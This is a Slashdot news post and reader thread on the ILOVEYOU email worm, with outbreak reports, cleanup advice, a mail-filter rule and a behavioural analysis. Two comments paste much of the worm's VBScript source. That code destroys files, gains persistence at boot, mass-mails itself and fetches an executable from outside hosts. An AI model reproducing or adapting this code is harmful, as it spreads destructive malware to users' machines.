Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

I Love You "Virus" Hates Everyone

CmdrTaco posted more than 14 years ago | from the just-when-the-last-rash-cleared-up dept.

Spam 519

Loquis was the first of seven billion readers to submit this story about the I Love You Virus and the UK. Its not really a virus: its a trojan that proclaims its love for the recipient and requests that you open its attachment. On a first date even! It then loves you so much that it sends copies of itself to everyone in your addressbook (slut!) and starts destorying files on your drive. Course they estimate that it's infected 10% of the UK. Pine/Elm/Mutt users as always laugh maniacally as the trojan shuffles countless wasted packets over saturated backbones filling overworked SMTP servers everywhere. Sysadmins are seen weeping in the alleys. Update: 05/04 03:12 by CT : My Roommate Kurt "The Pope" DeMaagd has written a better summary of the trojan and more importantly a HOWTO fix it. Windows users only ;) Requires registry hacking, so its not for everyone.

cancel ×

519 comments

Sorry! There are no comments related to the filter you selected.

What's love got to do with it? (1)

sensate_mass (171138) | more than 14 years ago | (#1092555)

We've got to come up with another venue for the kiddies to get their fame. Maybe we can bring back graffiti.

Looks a bit like Melisa (1)

davetza (117689) | more than 14 years ago | (#1092556)

From reports that are coming in it looks like it started somewhere in Asia and then moved into Europe. Alot of ISP's on South Africa have also been badly affected

OPening e-mail attachments (1)

waldeaux (109942) | more than 14 years ago | (#1092557)

OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

This hit where I work. (4)

Shadowlion (18254) | more than 14 years ago | (#1092558)

I have Outlook 2000 open as we speak.

So far, I've received (estimated) about fifty copies of the damn thing. It's funny, in a "well, hey, look - a train wreck" sort of way.

First Post - without email here (1)

nospoon (126741) | more than 14 years ago | (#1092559)

The email Servers where I work have been shutdown do to this nasty bugger. It came in over out WAN from Germany and the UK sometime around 3AM.

Guess it will be a quiet day today!

Mixed emotions... (1)

Rob Kaper (5960) | more than 14 years ago | (#1092560)

ILOVEYOU?!?!

They would be better off calling these viruses "Mixed emotions".. perhaps our Linux team thought it was funny, but our NT team did not. ;-)

This amused everyone in my office (1)

frog51 (51816) | more than 14 years ago | (#1092561)

We thought it was weird, but it wouldn't run on most of my colleagues machines anyway - so I opened it using a text editor, and it's written in plain, unobfuscated text.
Lines like spread(email) are kinda obvious.

Still, the first guy who got it was distraught that she didn't love him after all:)

Dunno about the virus... (4)

BrianW (180468) | more than 14 years ago | (#1092562)

But the number of "If you get an email that says 'I love you', DON'T OPEN IT!" messages are getting a bit annoying.

Well, it is in the US already. (1)

fransdw (17996) | more than 14 years ago | (#1092563)

It is already in FL and making its way through the government address books which are not small by any measure.

They need to implement the Chinese solution... (1)

Rombuu (22914) | more than 14 years ago | (#1092564)

...for this sort of thing, if you know what I mean...

Weaping? (1)

howly (96368) | more than 14 years ago | (#1092565)

What's this "Weaping" business? Is it some sort of Elmer Fudd-ism? It's WEEPING. Buy a spell checker.

Thank you for your innovation, Microsoft! (1)

korpiq (8532) | more than 14 years ago | (#1092566)


This is /just/ so crappy. You know, before 1995 every time someone forwarder you a warning of this-and-that e-mail virus, you'd respond by "Viruses don't spread by e-mail."

What the heck do I care, but it pisses me off to see that some people even at my work place can be disturbed by this. Internally we're an AIX house, for God's sake!

Clean up (4)

xianzombie (123633) | more than 14 years ago | (#1092567)

As far as i know, the virus started out in Asia (somewhere) and made its way to Europe and now the US (Including many millitary installations as well).

Sites I've found that offer disenfectants are a post on ZDNet http://www.zdnet.com/tlkbck/comment/22/0,7056,8875 4-421758,00.html, as well as http://www.f-source.com

good luck people

Not just the UK, Indiana is getting hammered, too. (1)

Frederick Paepke (6705) | more than 14 years ago | (#1092568)

It's not just the UK that getting hit hard. Things here in northern Indiana are very ugly this morning.

Re:This hit where I work. (2)

Shadowlion (18254) | more than 14 years ago | (#1092569)

On the other hand, I'm personally not stupid enough to open an attachment like this (especially with the obvious tagline of "LOVE-LETTER-FOR-YOU.TXT.vbs" - gee, you think that's a Visual Basic script?).

I should really be compiling a list of the coworkers I'm receiving this from. It always pays to know where stupidity is in the org chart.

Netscape Messenger (1)

kperrier (115199) | more than 14 years ago | (#1092570)

Hey! Those of us who use messenger are not immune to this as well. I have recieved about 10 copies of it this morning.. And the IT folks want to know why I don't want to use Outlook......

Maybe this can get companies to consider UNIX? (3)

jaf (121858) | more than 14 years ago | (#1092571)

Our company was just hit by this - one NT server and two workstations down.. it deletes and renames files like there's no tomorrow.

UNIX would not have a problem here..

Maybe in the long run though - but at least a virus would "only" be able to do what the user can do - not nuke the system.

People still have to be dumb enough to open the attachment.

I got it..... (3)

peterdaly (123554) | more than 14 years ago | (#1092572)

The nice thing about virus's like this is you find out about people you never met who have you in their address book....at least in my case. -Pete

Showed up here, too! (1)

Bob McCown (8411) | more than 14 years ago | (#1092573)


We've got a copy of it here, but it was caught by an on-the-ball employee that recieved it, and forwarded it to the IT department...

windoze only!!!! (1)

gerti (22279) | more than 14 years ago | (#1092574)

At the lab I'm working as a system administrator, we're jumping with joy as we see the number of companies that suffer from this virus grow. We're using iMacs, OS X server Macs, and suns running Solaris boxes, and everything is perfectly allright here :-))

Re:Looks a bit like Melisa (4)

deasmi (97040) | more than 14 years ago | (#1092575)

The first two lines of the script are quite ammusing.
rem barok -loveletter(vbe) rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
I do hope that's not his real address....

Bad Worm. (1)

trexl (16434) | more than 14 years ago | (#1092576)

What a treat. Is it just me or are viruses that affect e-mail seen as so much scarier since the user gets to see something, as opposed to other viruses that do damage and don't announce themselves.

Anyway, I read this over on OSOpinion [osopinion.com] ... but could MS's implanting of Outlook in nearly everything actually be more damaging than their inclusion of IE in DOS?

Total Cost of ownership if Outlook/Exchange (5)

smartin (942) | more than 14 years ago | (#1092577)

This is the second time in a couple of months that I've been at a company where this sort of thing has gone around and around. Companys really need to be aware of the consequences of using Outlook and Exchange. This does not happen when you are using Sendmail and a regular POP3 or IMAP client.

Well Damn (2)

zpengo (99887) | more than 14 years ago | (#1092578)

Now I have to tell my girlfriend to delete all my old e-mails, because they had that subject line, and you never know!

Re:OPening e-mail attachments (5)

akey (29718) | more than 14 years ago | (#1092579)

OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

Personally, I loved the quote from the journalist who said that she was suspicious when she received 5 copies of it, but since the last one was from Dow Jones, she opened it anyway... :-)

---

Re:OPening e-mail attachments (1)

MarkKomus (71304) | more than 14 years ago | (#1092580)

Some users still get confused if the default username in the login box gets changed. We have a ways to go before they'll learn about e-mail attachments.

Solution for Postfix (5)

njr (115982) | more than 14 years ago | (#1092581)

If not active in /etc/postfix/main.cf uncomment the line and change it to a line similar to:

header_checks = regexp:/etc/postfix/header_checks

Add the following line in /etc/postfix/header_checks:

/^Subject: ILOVEYOU/ REJECT

This will reject mails containing this subject.

Thanks to Claus Guttesen who posted this on the postfix mailling list.

Source at ftp://weazel.student.utwente.nl/pub/ (2)

Anonymous Coward | more than 14 years ago | (#1092582)

It's a very nasty trojan, especially because it starts automatically after a reboot. To be sure what is does and doesn't, look at: ftp://weazel.student.utwente.nl/pub/mailworm.txt

Blasted thing... (1)

thenerd (3254) | more than 14 years ago | (#1092583)

Things have been fairly cool here (r&d for telecoms). They reckon it came from the Phillipines, for some reason.

I got it without an attachment, and emailed the woman back 'I'm mortified that you didn't include the letter'.

I'm not sure whether I feel like an idiot or what!

thenerd.

Fast spread, but better handled? (2)

redelm (54142) | more than 14 years ago | (#1092584)

I never saw Melissa, but I did get three copies of ILOVEYOU thanks to the corporate-wide mailing list. That was this morning. Since then, our mailadmins have done an admirable job, and I've seen none. I'm glad somebody took Melissa as a wake-up call.

This really is a problem.. (1)

MonkeyMagic (118319) | more than 14 years ago | (#1092585)

..as it is sooo easy to access the windows address book and Exchange from a program without even needing a password. I'm not sure how this one worked as our mail has been shut down and therefore I can't get a copy, but for there to be no need for permissions (at least, this is the case on NT) is ridiculous.

Re:What's love got to do with it? (1)

SEWilco (27983) | more than 14 years ago | (#1092586)

But this is graffiti, for the lazy. It spreads itself around.

Too many email users are ignorant as piss. (1)

unquiet (64767) | more than 14 years ago | (#1092587)

Sometimes they get what they deserve by opening executables. Sometimes others get what the ignoramus deserves, when it's doing the address book lookup. Education about using email [unquietmind.com] is the answer. Too bad it's not 100% effective.

Analysis (1)

Anonymous Coward | more than 14 years ago | (#1092588)

This analysis I did this mornig in a rush when one of our HR girls ran it. It's a VBS worm. It spreads by two methods, irc and email. On startup it sets the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout to 0 It then copies itself to WINNT/SYSTEM32/MSKernel32.vbs WINNT/Win32DLL.vbs WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT It then creates registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSKernel32 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\Win32DLL which will run the script again on the next boot of the computer Next it checks to see if ie download directory is set in the registry - if it is it remembers that value, otherwise it uses c:\ instead. It then checks to see it /WINNT/SYSTEM32/WInFAT32.exe exists - if it does it sets internet explorers start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net It then checks to see it this file has been downloaded (i.e. when the script is run at a later date). If it has to sets this .exe to be run at next boot and resets i.e home page to about:blank (blank page) Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM This basically contains the worm itself set to run when the page is viewed. Now it does to old trick of openning the Outlook address book, grabbing *all* the entries in it and emailing then an email with the subject line "ILOVEYOU" and the worm as an attachment. Now it has a look around all the drives on the machine (local drives I think) as does the following a) If it find mirc, edits it's ini file so when you next log onto an irc channel it dcc's itself to all the other users b) Overwrites any .vbs and .vbe files it finds with itself c) If it finds any vbs, vbe, css,, wsh, sct or hta files it deletes them, creates a new file with the same name ending in vbs and copies itself to it d) Does similar things to (c) to .mp3, .mp2, .jpg, .jpeg Then the script ends Stuart

That's Funny... (1)

Gorth (35695) | more than 14 years ago | (#1092589)

I wake up this morning, check /. as usual and see this story. About 5mins after seeing the story and chuckling to myself about the entire idea of virii, guess what appeared in my inbox.. Yup A copy of this trojan for my very own ;)

Re:Dang! (1)

aclute (94263) | more than 14 years ago | (#1092590)

that's ok! Reading the email is ok, it is running the attachment is bad! You didn't do anything

Democracy wiped out by killer trojan (1)

pyrotic (169450) | more than 14 years ago | (#1092591)

Poor old House of Commons. Seems our beloved democracy has been bought to its knees by this one.

Pretty Nasty actually (5)

scrutty (24640) | more than 14 years ago | (#1092592)

We got hit in our office this morning. Obviously the techs like me were running Linux and laughed it off. But unlike Melissa this one actually carries a nasty payload.

It mails to everyone in your Outlook addressbook, not just 50. Also your MIRC nick list. It trawls all your mounted directories copying itself over all MP3's JPEGS .jpgs, style sheets and .js files amongst others

This actually managed to knock out half of our office , as well as render one of our live web servers pretty messed up , within under 10 minutes of the first person activating it. Yes, the webserver was a linux box, but one unfortunate had a subtree on a server that mirrored stuff to it mounted over a samba share

And no, you didn't have to click on it. That damn preview pane was enough to trigger it off.

Re:This hit where I work. (1)

d-e-w (173678) | more than 14 years ago | (#1092593)

Yup - hit my computer about 8:30AM CDT. I noticed it because 1. the guy that "sent" the damn thing definitely wouldn't be sending a "love letter" to me ;) and that 2. I used to share an email address with another person in the office and so received two copies.

Grabbed the server guy when he walked in a couple of minutes later and forced him to get a block enabled. We're behind a 166 DSL line and don't need that crap clogging it up for the rest of the day.

BTW, I'm US-based. We're international and work a lot with people from the UK, which is probably where it came in from, but the first guy who received it here probably spread it near and far across the US. :( His address book is probably has hundreds of people and I don't see any mention of this having a max. So it's come to the US.

D'oh ! (1)

Camelot (17116) | more than 14 years ago | (#1092594)

Personally, I loved the quote from the journalist who said that she was suspicious when she received 5 copies of it, but since the last one was from Dow Jones, she opened it anyway... :-)

Would you like to date a guy who is called "Dow" ? D'oh, I'll say.

Just some info... (1)

IainMH (176964) | more than 14 years ago | (#1092595)

I also got voicemails as well as half a meg of 'don't open it e-mails' To remove this email from Netscape : >From the View menu go to show and make sure there is not a tick next to the message option. It there is a tick select message. Once done the message window should disappear. You can highlight the email to delete it. Do not double click on it otherwise it will open the email. Once deleted you will need to empty your trash. To remove from Outlook : >From the view menu deselect "Preview Pane" so that you can't see what the contents of the message is. Then delete the mail. You will need to empty your trash too. If anyone is interested, I got mail the script... rem barok -loveletter(vbe) rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32 ",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Wi n32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhj kxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfd jghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRp Gqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNB mnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX .exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFI X",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eqfolderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.i ni") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-Y OU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="LOVELETTER - HTML"&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ "

This HTML file need ActiveX Control

To Enable to read this HTML file
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _ "----------z--------------------z---------- "&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ "" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr( 91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr (93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr( 37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-Y OU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU .HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub

E-mail too versatile? (2)

zpengo (99887) | more than 14 years ago | (#1092596)

Perhaps we should go back to the days of simple e-mail clients, that would make a virus like this look around, get confused, and then fall over.

Either that, or people need to stop using the address books, which are for lusers anyway! :o)

It's hitting all over Europe. (2)

Noryungi (70322) | more than 14 years ago | (#1092597)


My job's sysadmin has already warned us that the virus was in the wild somewhere, and has asked us *not* to open anything suspicious.

I know that several large firms in my area are also scrambling to stop the infection. This virus can stop any MS system dead in its tracks and clog the others beyond repair. Tough little one!

The Netherlands are being hit hard too (1)

Bardad (19676) | more than 14 years ago | (#1092598)

Dutch news has that some 10% of bigger companies have shut down their email systems as a result of the "I LOVE YOU" virus already. It is on the radio news right now, as the first item.

If you have a chance, take a look at the virus code, and see what some 300 lines of visual basic can cost industry in say a 24 hour period.

In fact, as I write this, a guy from our support department comes in and hands me a printed "Virus Alert" piece of paper! It says the virus sends itself to all addresses in you address book. Having looked at the code, the virus also checks if you run an IRC client, and sends itself to everyone in all channels you are in.

The virus also changes all .MP2 .MP3 .CSS .HTML and .JPG files, and renames them to .VBS files!

Hmmm... there seems to be some really bored kid out there somewhere... the first line of the virus script reads:
rem barok -loveletter(vbe)

Ron Sprenkels (sprenkel@cs.utwente.nl)

Outlook Strikes Again. (2)

nard (165611) | more than 14 years ago | (#1092599)

From my initial investigation it looks like it is totally MS Specific. So own up then how many /. readers have been kicked in the balls? Come out of the closet all of you!

LINUX (1)

gordzilla (97994) | more than 14 years ago | (#1092600)

I LOVE YOU (sorry, couldn't resist)

Next step: AutoEducation.exe (3)

FascDot Killed My Pr (24021) | more than 14 years ago | (#1092601)

This virus follows the same pattern of "send to everyone in the address book", but ALSO appends the senders name to a data file included with the virus.

The recipient then falls into one of three classes:

1) Can't get/read virus.
2) Can get/read virus and gets stung (and appended to list).
3) Can get/read virus, doesn't get stung, recieved handy list of idiot coworkers.

This list can be used in a multitude of ways:

1) Reduce headcount
2) List of gullible fools who will buy $2 candy bars "to send the Girl Scouts to the Moon"
3) Identify users who need "training" (sit in a small hot room with each other and an instructor who does nothing but taunt them for their hunt-n-pecking)

--
Have Exchange users? Want to run Linux? Can't afford OpenMail?

*sob* (3)

Raymond Luxury Yacht (112037) | more than 14 years ago | (#1092602)

The only love letter I've ever gotten... and I can't open it....

Re:Analysis (5)

Anonymous Coward | more than 14 years ago | (#1092603)

Sorry - lost the /n's there

It's a VBS worm. It spreads by two methods, irc and email.

On startup it sets the registry key
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
to 0

It then copies itself to WINNT/SYSTEM32/MSKernel32.vbs
WINNT/Win32DLL.vbs
WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT

It then creates registry keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu rrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu rrentVersion\RunServices\Win32DLL

which will run the script again on the next boot of the computer

Next it checks to see if ie download directory is set in the registry
- if it is it remembers that value, otherwise it uses c:\ instead.

It then checks to see it /WINNT/SYSTEM32/WInFAT32.exe exists - if it does
it sets internet explorers start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net

It then checks to see it this file has been downloaded (i.e. when the script is run at a later date). If it has to sets this .exe to be run at next boot and resets i.e home page to about:blank (blank page)

Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM
This basically contains the worm itself set to run when the page is
viewed.

Now it does to old trick of openning the Outlook address book, grabbing
*all* the entries in it and emailing then an email with the subject line "ILOVEYOU" and the worm as an attachment.

Now it has a look around all the drives on the machine (local drives I think) as does the following
a) If it find mirc, edits it's ini file so when you next log onto an
irc channel it dcc's itself to all the other users
b) Overwrites any .vbs and .vbe files it finds with itself
c) If it finds any vbs, vbe, css,, wsh, sct or hta files it deletes them,
creates a new file with the same name ending in vbs and copies itself to
it
d) Does similar things to (c) to .mp3, .mp2, .jpg, .jpeg

Then the script ends

Stuart

Re:Pretty Nasty actually (1)

xianzombie (123633) | more than 14 years ago | (#1092604)

On the contrary, I use the preview pane and it was not triggered on my system...

...or maybe they took the mail server down prior to me noticing it being on my system....that would suck....

Re:Maybe this can get companies to consider UNIX? (1)

Smallest (26153) | more than 14 years ago | (#1092605)

<i>UNIX would not have a problem here..</i>

Windows is not the problem - Outlook is. If SendMail was as wide open as Outlook is, UNIX would have the same problem.

Re:Just some info... (1)

IainMH (176964) | more than 14 years ago | (#1092606)

Bugger - should have used the preview....

Just wanted Plain Old Text..

sorry :-~

Someone please explain.. (1)

Rob Kaper (5960) | more than 14 years ago | (#1092607)

Fortunately, our office is not affected yet, one of our clients warned us in time - not by e-mail I presume.

What worries me, and I like to have this explained, is why people continue to use Outlook.

First it was Melissa, now it is ILOVEYOU.. you would think that someone would wake up and do something constructive such as switching to a mail program that would and could not be affected.

I've tried to reason with our NT users, telling them that we got away these two times but that the next time (because there will be a next time I'm afraid) we might not be so lucky. Are there any worthy alternatives to Outlook? [worthy enough to convince the NT group.. you know how stubborn they are.. they're almost zealots like us ;-)]

Re:Total Cost of ownership if Outlook/Exchange (2)

sTeF (8952) | more than 14 years ago | (#1092608)

it's indifferent, if you use sendmail or exchange it depends on the os, if your os is capable of running vb crap, and you e-mail client is configured to run it, then you suffer, i can imagine pine running on window, with a mailcap entry for vbs files... but most nobody is that stupid.

Outlook Exchange Web Server (1)

Glytch (4881) | more than 14 years ago | (#1092609)

My college email comes through an Outlook web server (right here, if you're interested [nbcc.nb.ca] ) and I'm wondering if I've got anything to worry about. I've tried to get the bloody admins to allow POP email clients to work with the college's system, but the morons don't know how to do it.

Outlook web admins, should I be worried at all?

Worm love? (1)

jaf (121858) | more than 14 years ago | (#1092610)

Maybe in a few weeks, we will have a different worm (a small variation) saying "ILOVEYOUTOO" :)

Here is the Visual Basic Script that is "ILOVEYOU" (5)

GC (19160) | more than 14 years ago | (#1092611)

rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micr osoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32",dirsystem&"\ MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Win32DLL",dirwin &"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micr osoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhj kxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7 679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfd jghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
